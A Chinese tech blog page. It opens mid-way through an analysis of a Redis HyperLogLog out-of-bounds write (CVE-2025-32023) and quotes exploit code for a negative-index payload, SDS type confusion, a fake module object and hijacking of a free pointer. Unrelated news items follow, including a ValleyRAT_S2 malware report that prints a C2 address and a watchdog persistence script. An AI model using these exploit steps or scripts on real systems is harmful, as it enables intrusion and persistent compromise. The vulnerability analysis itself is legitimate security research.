if (hdr->encoding == HLL_DENSE) return C_OK;

/* Create a string of the right size filled with zero bytes.
* Note that the cached cardinality is set to 0 as a side effect
* that is exactly the cardinality of an empty HLL. */
dense = sdsnewlen(NULL,HLL_DENSE_SIZE);
hdr = (struct hllhdr*) dense;
*hdr = *oldhdr; /* This will copy the magic and cached cardinality. */
hdr->encoding = HLL_DENSE;

/* Now read the sparse representation and set non-zero registers
* accordingly. */
p += HLL_HDR_SIZE;
while(p < end) {
if (HLL_SPARSE_IS_ZERO(p)) {
runlen = HLL_SPARSE_ZERO_LEN(p);
idx += runlen;
p++;
} else if (HLL_SPARSE_IS_XZERO(p)) {
runlen = HLL_SPARSE_XZERO_LEN(p);
idx += runlen;
p += 2;
} else {
runlen = HLL_SPARSE_VAL_LEN(p);
regval = HLL_SPARSE_VAL_VALUE(p);
if ((runlen + idx) > HLL_REGISTERS) break; /* Overflow. */
while(runlen--) {
HLL_DENSE_SET_REGISTER(hdr->registers,idx,regval);
idx++;
}
p++;
}
}

/* If the sparse representation was valid, we expect to find idx
* set to HLL_REGISTERS. */
if (idx != HLL_REGISTERS) {
sdsfree(dense);
return C_ERR;
}

/* Free the old representation and set the new one. */
sdsfree(o->ptr);
o->ptr = dense;
return C_OK;
}

while 循环之前是对 HLL 数据的的部分 header 解析，之后是一个转换过程。 HLL 数据是一种 SDS ^[2]字符串的表示。我们可以用 set 命令来伪造一个 HLL 数据。

while 循环过程中，是将 HLL 的数据从 sparse 转换成 dense。在转换过程中：

while(p < end) {
if (HLL_SPARSE_IS_ZERO(p)) {
runlen = HLL_SPARSE_ZERO_LEN(p);
idx += runlen;
p++;
} else if (HLL_SPARSE_IS_XZERO(p)) {
runlen = HLL_SPARSE_XZERO_LEN(p);
idx += runlen;
p += 2;
} else {
runlen = HLL_SPARSE_VAL_LEN(p);
regval = HLL_SPARSE_VAL_VALUE(p);
if ((runlen + idx) > HLL_REGISTERS) break; /* Overflow. */
while(runlen--) {
HLL_DENSE_SET_REGISTER(hdr->registers,idx,regval);
idx++;
}
p++;
}
}

如果当前的数据既不是 HLL_SPARSE_IS_ZERO 也不是 HLL_SPARSE_IS_XZERO 会进入到 HLL_DENSE_SET_REGISTER 函数，在进到 HLL_DENSE_SET_REGISTER 函数之前有一个判断这个 idx 是否越界。

1	if ((runlen + idx) > HLL_REGISTERS) break; /* Overflow. */

runlen 和 idx 都是一个 int 类型的变量，，而 idx 的值可以在 HLL_SPARSE_IS_ZERO 或者 HLL_SPARSE_IS_ZERO 条件下语句中累加而成。

我们可以通过构造 HLL 数据，让 idx 不断累加成一个负数。

然后在 HLL_DENSE_SET_REGISTER 函数中就会发生越界

#define HLL_DENSE_SET_REGISTER(p,regnum,val) do { \
uint8_t *_p = (uint8_t*) p; \
unsigned long _byte = (regnum)*HLL_BITS/8; \
unsigned long _fb = (regnum)*HLL_BITS&7; \
unsigned long _fb8 = 8 - _fb; \
unsigned long _v = (val); \
_p[_byte] &= ~(HLL_REGISTER_MAX << _fb); \
_p[_byte] |= _v << _fb; \
_p[_byte+1] &= ~(HLL_REGISTER_MAX >> _fb8); \
_p[_byte+1] |= _v >> _fb8; \
} while(0)

PoC 构造

构造越界 payload

HLL 结构大致如下：


// 1. HLL 总体结构
struct hllhdr {
char magic[4];      /* "HYLL" */
uint8_t encoding;   /* HLL_DENSE or HLL_SPARSE. */
uint8_t notused[3]; /* Reserved for future use, must be zero. */
uint8_t card[8];    /* Cached cardinality, little endian. */
uint8_t registers[]; /* Data bytes. */
};

#define HLL_P 14 /* The greater is P, the smaller the error. */
#define HLL_REGISTERS (1<<HLL_P) /* With P=14, 16384 registers. */
#define HLL_DENSE_SIZE (HLL_HDR_SIZE+((HLL_REGISTERS*HLL_BITS+7)/8))

+---------+----------+-----------+--------+-----------
| "HYLL"  | encoding |  noused   | card   | registers
+---------+----------+--------------------+-----------
4字节      1字节        3字节       8字节    12288字节

稀疏（Sparse）编码

1
2
3

+---------+----------+---------+---------+-------------------+
| "HYLL"  |  0x01    | 保留3字节 | 保留8字节 | 指令流（2字节/条） |
+---------+----------+---------+---------+-------------------+

从作者的exploit^[3]可以看到，作者通过构造如下的 HLL sparse 让在代码在转换的时候能计算出来一个负数的idx

pl = b'HYLL'·
pl += p8(HLL_SPARSE) + p8(0)*3
pl += p8(0)*8
assert len(pl) == 0x10
pl += xzero(0x4000) * 0x3fffd   # -0xc000
pl += xzero(0xc000 - 0x956c)    # -0x956c, where divmod(-0x956c*6, 8) = (-0x7011, 0)
pl += p8(0b1_00011_00)          # runlen = 1, regval = 4 = SDS_TYPE_64 => -0x956b, overwrite sds:b type
pl += xzero(0x156b)             # -0x8000
pl += xzero(0x4000) * 3         # 0x4000
time.sleep(1)
r.set('hll:expp', pl)

可以看到有一段 xzero(0x4000) * 0x3fffd 的数据，可以通过这样数据，就构造 0x3fffd 轮次的 0x4000 idx 累加，在加上后面的 pl += xzero(0xc000 - 0x956c) 数据，最后就能构造一个负数的 idx

寻找越界写目标

在单次下，我们可以从 registers 往前越界写任意（可构造）偏移一个字节。作者的思路是在 HLL 结构前面构造 sds 结构，然后修改 sds 结构的 len 来进行类型混淆。

sds 有几种不同的类型，其取长度的方式也不一样·

static inline size_t sdslen(const sds s){
unsigned char flags = s[-1];
switch(flags&SDS_TYPE_MASK) {
case SDS_TYPE_5:
return SDS_TYPE_5_LEN(flags);
case SDS_TYPE_8:
return SDS_HDR(8,s)->len;
case SDS_TYPE_16:
return SDS_HDR(16,s)->len;
case SDS_TYPE_32:
return SDS_HDR(32,s)->len;
case SDS_TYPE_64:
return SDS_HDR(64,s)->len;
}
return 0;
}

例如正常情况下，我们使用 setrange 长度为0x37fa-8长度，此时长度小于 65535 , 根据函数sdsReqType 创建出来的 sds 数据，其 flags 位置应该是 2 （SDS_TYPE_16）


//func sdsnewlen()-> _sdsnewlen() ->

static inline char sdsReqType(size_t string_size){
if (string_size < 1<<5)
return SDS_TYPE_5;
if (string_size < 1<<8)
return SDS_TYPE_8;
if (string_size < 1<<16)
return SDS_TYPE_16;
#if (LONG_MAX == LLONG_MAX)
if (string_size < 1ll<<32)
return SDS_TYPE_32;
return SDS_TYPE_64;
#else
return SDS_TYPE_32;
#endif
}

然后在 _sdsnewlen 函数中完成对 sds 结构的初始化

sds _sdsnewlen(const void *init, size_t initlen, int trymalloc) {
char type = sdsReqType(initlen);
/* Empty strings are usually created in order to append. Use type 8
* since type 5 is not good at this. */
if (type == SDS_TYPE_5 && initlen == 0) type = SDS_TYPE_8;
int hdrlen = sdsHdrSize(type);
unsigned char *fp; /* flags pointer. */
size_t usable;
...
s = (char*)sh+hdrlen;
fp = ((unsigned char*)s)-1;
...
switch(type) {
case SDS_TYPE_5: {
*fp = type | (initlen << SDS_TYPE_BITS);
break;
}
case SDS_TYPE_8: {
SDS_HDR_VAR(8,s);
sh->len = initlen;
sh->alloc = usable;
*fp = type;
break;
}
case SDS_TYPE_16: {
SDS_HDR_VAR(16,s);
sh->len = initlen;
sh->alloc = usable;
*fp = type;
break;
}
case SDS_TYPE_32: {
SDS_HDR_VAR(32,s);
sh->len = initlen;
sh->alloc = usable;
*fp = type;
break;
}
case SDS_TYPE_64: {
SDS_HDR_VAR(64,s);
sh->len = initlen;
sh->alloc = usable;
*fp = type;
break;
}
}
if (initlen && init)
memcpy(s, init, initlen);
s[initlen] = '\0';
return s;

在内存中可以看到

pwndbg> p/x 0x8c & 0x3
$106 = 0x0
pwndbg> p idx
$107 = -38252
pwndbg> p idx*6/8
$108 = -28689
pwndbg> p hdr->registers
$109 = 0x7ffff797d015 ""
pwndbg>
pwndbg> x/20bx 0x7ffff7976000
0x7ffff7976000: 0xfa    0x37    0xfa    0x37    0x02    0x00    0x00    0x00
0x7ffff7976008: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x7ffff7976010: 0x00    0x00    0x00    0x00

pwndbg> x/20bx  0x7ffff7976000+0x37fa-8
0x7ffff79797f2: 0x00    0x00    0x00    0x00    0x00    0x42    0x42    0x42
0x7ffff79797fa: 0x42    0x42    0x42    0x42    0x42    0x00    0xfa    0x37
0x7ffff7979802: 0xfa    0x37    0x02    0x00
pwndbg>
pwndbg> p/x *(struct sdshdr16 *)0x7ffff7976000
$104 = {
len = 0x37fa,
alloc = 0x37fa,
flags = 0x2,
buf = 0x7ffff7976005
}
pwndbg>

由于 sdslen 函数取 sds 长度，是先根据不同的 flags，然后再根据这个 flags 取计算这个 sds 的header 长度，然后以当前地址减去 header长度取 len 这个变量

static inline size_t sdslen(const sds s){
unsigned char flags = s[-1];
switch(flags&SDS_TYPE_MASK) {
case SDS_TYPE_5:
return SDS_TYPE_5_LEN(flags);
case SDS_TYPE_8:
return SDS_HDR(8,s)->len;
case SDS_TYPE_16:
return SDS_HDR(16,s)->len;
case SDS_TYPE_32:
return SDS_HDR(32,s)->len;
case SDS_TYPE_64:
return SDS_HDR(64,s)->len;
}
return 0;
}

struct __attribute__ ((__packed__)) sdshdr16 {
uint16_t len; /* used */
uint16_t alloc; /* excluding the header and null terminator */
unsigned char flags; /* 3 lsb of type, 5 unused bits */
char buf[];
};

struct __attribute__ ((__packed__)) sdshdr64 {
uint64_t len; /* used */
uint64_t alloc; /* excluding the header and null terminator */
unsigned char flags; /* 3 lsb of type, 5 unused bits */
char buf[];
};

而 sdshdr64 和sdshdr16 的结构体大小不一样，因此如果将 sds16的 flags 改成 SDS_TYPE_64 , 将为从上一个内存中取一个值作为 sds的长度（造成一个类似类型混淆的效果）

fakelen = 0x4142434445464748

r.setrange('sds:aa', 0x37fa - 11, p64(fakelen))  # sds @ 0x0005, p64() 00 00 00 00
r.setrange('sds:bb', 0x37fa - 8, b'B'*8)         # sds @ 0x3805, ................. fa 37 fa 37 02 ~

例如下面的这样的一个效果

pwndbg> p/x *(struct sdshdr16 *)0x7ffff7976000
$115 = {
len = 0x37fa,
alloc = 0x37fa,
flags = 0x2,
buf = 0x7ffff7976005
}
pwndbg> p/x *(struct sdshdr64 *)(0x7ffff7976000-11)
$116 = {
len = 0x41424344454647,
alloc = 0x237fa37fa000000,
flags = 0x0,
buf = 0x7ffff7976006
}
pwndbg>

当从 sdshder16 被当成 sdshdr64 后， sds:b 的长度就变成了上一个内存的一个可控制，作者是将这个值设置成0x41424344454647。这样当我们就可以将这个sds:b 当作一个很长的字符串进行操作。作者后面的思路是在内存后喷一堆 embstr，然后取读取 sds:b 的内容。由于此时 sds:b 长度很长，因此读取这个字符串的时候能读书很多的数据，可以读到内存后面很多的东西，这样就可以做 info leak。

然后通过写 sds:b 字符串到操作，在内存中伪造了一个 type 为 Modules 的 Object

# fake module object
pl = p8(0x05) + dump[tofs+1:tofs+4]   # type, encoding, lru
pl += p32(1)                          # refcount
pl += p64(badr + 0x10)                # ptr
r.setrange('sds:bb', tofs+3, pl)

typedef struct RedisModuleType {
uint64_t id; /* Higher 54 bits of type ID + 10 lower bits of encoding ver. */
struct RedisModule *module;
moduleTypeLoadFunc rdb_load;
moduleTypeSaveFunc rdb_save;
moduleTypeRewriteFunc aof_rewrite;
moduleTypeMemUsageFunc mem_usage;
moduleTypeDigestFunc digest;
moduleTypeFreeFunc free;
moduleTypeFreeEffortFunc free_effort;
moduleTypeUnlinkFunc unlink;
moduleTypeCopyFunc copy;
moduleTypeDefragFunc defrag;
moduleTypeAuxLoadFunc aux_load;
moduleTypeAuxSaveFunc aux_save;
moduleTypeMemUsageFunc2 mem_usage2;
moduleTypeFreeEffortFunc2 free_effort2;
moduleTypeUnlinkFunc2 unlink2;
moduleTypeCopyFunc2 copy2;
moduleTypeAuxSaveFunc aux_save2;
int aux_save_triggers;
char name[10]; /* 9 bytes name + null term. Charset: A-Z a-z 0-9 _- */
} moduleType;


void freeModuleObject(robj *o){
moduleValue *mv = o->ptr;
mv->type->free(mv->value);
zfree(mv);
}

通过需改 type->free 来控制 PC

完整的利用流程

可以看 deepwiki 生成的这个流程图^[4]

Reference link

1.https://redis.io/docs/latest/commands/pfmerge/↩
2.https://redis.io/docs/latest/operate/oss_and_stack/reference/internals/internals-sds/↩
3.https://github.com/leesh3288/CVE-2025-32023↩
4.https://deepwiki.com/leesh3288/CVE-2025-32023/2.2-six-stage-exploitation-methodology↩

行业热度褪去：戴尔坦言“AI PC”叙事未获消费者认可

作者: 纯情
时间: 2026-01-20
分类: 资讯
评论

过去两年间，科技行业的领军者 —— 包括英特尔（Intel）、超威半导体（AMD）、高通（Qualcomm）等芯片巨头，以及软件架构巨头微软（Microsoft）—— 都在不遗余力地推广 “AI PC” 概念，试图推动一轮大规模硬件更新周期。然而，戴尔（Dell）近期坦诚承认：对绝大多数消费者而言，人工智能尚不足以成为购买新电脑的动力，甚至可能产生反效果。据《PC 玩家》（PCGamer）报道，戴尔已意识到，行业内铺天盖地的 “AI PC” 营销操作，与终端用户的实际需求之间存在巨大脱节。

戴尔方面表示，尽管公司仍致力于集成神经处理单元（Neural Processing Units, NPUs）并强化设备端推理能力，但市场实证表明，将 AI 定位为核心卖点 “未能有效刺激销量”。对普通消费者（而非科技爱好者）而言，AI 不仅无法激发购买热情，反而常引发他们对数据隐私安全和实际用途模糊性的疑虑。戴尔的观察显示，理性消费者仍将决策锚定在传统实用指标上：价格、性能、电池续航与可靠性。

与行业执着于 “每秒万亿次运算（TOPS）” 和专属 “Copilot 键” 不同，用户更看重设备的耐用性、运行流畅度和实际价值。这一现象凸显出当前消费级 AI 领域的关键短板：缺乏一款能打动用户的 “杀手级应用（Killer App）”，导致用户不愿为 “理论上的好处” 升级硬件。正因如此，在 2026 年国际消费电子展（CES 2026）上，戴尔发布的 XPS 系列笔记本调整了宣传方向，将重点转向便携性与耐用性。为提升该系列的高端定位，戴尔还采取了大胆的品牌策略：机身标识用 “XPS” 取代原有的 “Dell” logo，且宣传材料中刻意弱化了 AI 功能的提及。

尽管承认营销方向与用户需求存在偏差，戴尔仍强调，AI 仍是未来硬件更新周期的重要长期驱动力。行业共识认为，AI 必须从单纯的 “热门概念” 转变为无缝、可感知的实用工具，而实现这一转变的关键在于构建更完善的软件生态，而非简单堆砌硬件参数。戴尔的坦诚，实则揭开了行业内的 “公开秘密”：2024 至 2026 年间，尽管 NPU 的设备渗透率不断提升，但对普通办公和网页浏览等常规场景的体验提升微乎其微。

当 Windows Copilot 等功能仍依赖云端连接，且设备端生成式 AI 能力表现平平之时，消费者自然会回归理性，对比屏幕画质、设备续航等实际参数。AI PC 并非虚幻概念，其发展路径类似早期 5G 手机 —— 必须先搭建好硬件基础，后续才能出现足以证明其价值的软件应用。除非人工智能能进化为类似 Wi-Fi 那样 “无形却不可或缺” 的基础设施，否则过度宣传反而可能引发消费者的抵触情绪，让他们觉得自己是在为冗余功能支付溢价。

苹果确认谷歌 Gemini 将为 Siri 提供技术支持，强调隐私仍是核心优先级

作者: 纯情
时间: 2026-01-20
分类: 资讯
评论

苹果与谷歌已正式确认，下一代 Siri 将采用 Gemini 模型与 Google Cloud，双方达成一项为期多年的合作。

此前，苹果一直为 Siri 使用自研 AI 模型，但在性能上与 GPT、Gemini 甚至 Copilot 相比都显得力不从心。

如今，苹果与谷歌开启了多年合作。作为合作的一部分，未来版本的 Siri 将基于 Gemini 模型 运行。

此外，苹果的 Foundation Models（基础模型） 将以谷歌的 Gemini 为底层，并部署在谷歌云平台上。

谷歌在一份新闻稿中表示：

“这些模型将为未来的 Apple Intelligence 功能提供支持，包括将于今年推出的更具个性化的 Siri。”

苹果方面称：

“经过审慎评估，苹果认为谷歌的 AI 技术为 Apple Foundation Models 提供了最强大的基础，并对其将为苹果用户带来的创新体验感到兴奋。”

苹果强调，Apple Intelligence 将在苹果设备与 Private Cloud Compute（私有云计算） 上运行，公司长期坚持的隐私承诺 不会受到任何影响。

Apple Intelligence 的发展历程一直充满波折

Siri 问世至今已超过十年。尽管它曾是最优秀的 “个人助手” 之一，但如今的大型语言模型（LLMs）在能力上已远超苹果的实现。

在 2024 年的 WWDC 上，苹果宣布正在开发 Apple Intelligence，其中也包括一个更具 AI 能力的 Siri，例如支持个人上下文理解与屏幕内容感知。

然而，这些功能一再延期。

部分功能最终上线，但用户抱怨 Apple Intelligence 的准确性不佳，在执行复杂指令时经常失败。

尽管苹果的 AI 体验本应以 “安全” 和 “隐私友好” 为卖点，但最终呈现的初始体验却远未达到革命性的高度。

如今，苹果与谷歌合作，借助 Gemini 升级 Siri 体验。但这是否能实现苹果曾经承诺的那种革命性突破？只有时间能给出答案。

ValleyRAT_S2病毒攻击组织：投放隐匿恶意软件，窃取金融敏感信息

作者: 纯情
时间: 2026-01-20
分类: 资讯
评论

新一轮网络攻击正借助ValleyRAT_S2 恶意软件悄然入侵各类组织机构，该病毒可实现长期潜伏，并窃取目标机构的敏感金融数据。

ValleyRAT_S2 是 ValleyRAT 恶意软件家族的第二阶段载荷，基于 C++ 语言开发。一旦侵入目标网络，它就会以完整远程访问木马（RAT）的形态运行，让攻击者获得对受感染系统的高度控制权，同时搭建起稳定的数据外传通道。

当前，该攻击活动的主要传播途径为伪造的中文办公软件、破解版程序，以及伪装成人工智能表格生成工具的植马安装包。

在诸多攻击案例中，恶意软件会通过DLL 侧载技术实现植入：攻击者诱导一个带有合法数字签名的应用程序，加载看似正常的恶意动态链接库文件，例如命名为steam_api64.dll的恶意模块。

网络安全团队 APOPHiS 通过追踪多起相关攻击事件，确认ValleyRAT_S2 是此类入侵活动的核心第二阶段后门程序。

除此之外，该恶意软件还会通过鱼叉式钓鱼邮件附件，以及被劫持的软件更新渠道进行传播。

恶意文档或压缩包会将载荷文件释放至系统临时文件夹等路径，例如：

C:\Users\Admin\AppData\Local\Temp\AI自动化办公表格制作生成工具安装包\steam_api64.dll

攻击的第一阶段以躲避安全检测为核心目标，而 ValleyRAT_S2 则会接管后续操作，负责长期驻留控制、系统信息探查、凭证窃取及金融数据收集等关键任务。

ValleyRAT_S2 激活后，会对系统进程、文件系统及注册表项展开扫描，随后通过自定义 TCP 协议，连接预先写入代码的命令与控制（C&C）服务器，例如27.124.3.175:14852。该病毒具备文件上传下载、执行 Shell 命令、注入恶意载荷、记录键盘输入等多种功能，

这些特性使其能够精准窃取网银账户凭证、支付交易数据及内部财务文档。

持久化机制与监控守护功能

ValleyRAT_S2 的一大高危特性，是其多层级持久化设计与监控守护机制，这让它能够在系统重启或手动清理后依然存活。

恶意软件会先将相关文件释放到用户的临时文件夹（Temp）和应用数据文件夹（AppData）中，创建%TEMP%\target.pid这类进程标识文件，同时在%APPDATA%\Promotions\Temp.aps路径下生成配置文件。

它还会利用 COM 接口调用 Windows 任务计划程序，实现开机自启动；同时会在注册表启动项中写入备份路径，作为双重保障。

该病毒的一个关键特征是会生成一个名为monitor.bat的批处理脚本，以此构建监控守护循环。

这个脚本会从target.pid文件中读取恶意主程序的进程 ID，持续检查主程序是否处于运行状态，一旦发现主程序被终止，就会自动静默重启。

以下是该脚本的简化版本：

@echo off
set "PIDFile=%TEMP%\target.pid"
set /p pid=<"%PIDFile%"
del "%PIDFile%"
:check
tasklist /fi "PID eq %pid%" | findstr >nul
if errorlevel 1 (
  cscript //nologo "%TEMP%\watch.vbs"
  exit
)
timeout /t 15 >nul
goto check

这一守护循环，能让 ValleyRAT_S2 在主进程被安全工具或管理员终止后快速恢复。此外，该恶意软件还结合了结构化异常处理、沙箱环境检测，以及进程注入技术 —— 将自身注入Telegra.exe、WhatsApp.exe等具有可信名称的进程中，以此实现隐蔽且稳固的持久化驻留。

对于防御方而言，这意味着单纯终止恶意进程无法实现彻底清除；想要根除该病毒，必须同时针对计划任务、批处理与 VBS 监控脚本、释放的恶意文件及后门进程等所有相关组件，开展一体化清除操作。

高危警报：Moxa交换机存在OpenSSH远程代码执行漏洞（CVSS 9.8）

作者: 纯情
时间: 2026-01-20
分类: 资讯
评论

Moxa 的工业以太网交换机中被发现存在一个严重安全漏洞，可能威胁工业控制系统（OT）网络的完整性。该漏洞编号为 CVE-2023-38408，CVSS 评分高达 9.8（高危），意味着需要立即修复。

问题出在设备所使用的 OpenSSH 组件 中，具体影响 OpenSSH ssh-agent 在 9.3p2 之前版本中的 PKCS#11 功能。

该漏洞源于一个 “不可靠的搜索路径”。如果 ssh-agent 被转发到攻击者控制的系统，就可能导致远程代码执行（RCE）。像 /usr/lib 这样的目录中的代码并不一定安全，而该漏洞的出现是因为之前的问题 CVE-2016-10009 的修复并不彻底。

由于漏洞严重性极高，官方强烈建议用户立即采取修复措施以降低风险。

受影响的产品系列

Moxa 已确认两个主要产品系列受到影响：

1. EDS 系列

型号包括：EDS-G4000、EDS-4008、EDS-4009、EDS-4012、EDS-4014、EDS-G4008、EDS-G4012、EDS-G4014

受影响固件：4.1 及更早版本

2. RKS 系列

型号包括：RKS-G4000、RKS-G4028、RKS-G4028-L3

受影响固件：5.0 及更早版本

修复措施

Moxa 已发布安全补丁，但暂未提供公开下载。用户必须联系 Moxa 技术支持以获取补丁文件。

EDS 系列： 请求安全补丁 v4.1.58
RKS 系列： 请求安全补丁 v5.0.4

临时缓解方案

对于无法马上进行固件更新的组织，Moxa 建议采用纵深防御策略降低风险：

限制访问： 使用防火墙或访问控制列表（ACL）仅允许可信 IP 通信；通过 VLAN 隔离工业网络。
减少暴露面： 确保设备不直接暴露在互联网上，并关闭未使用的端口。
加强认证： 启用多因素认证（MFA）和基于角色的访问控制（RBAC）。
安全通信： 使用 VPN 或 SSH 等加密协议进行远程访问，并仅限授权人员使用。
监控： 部署异常检测以发现未授权活动，并定期审查审计日志。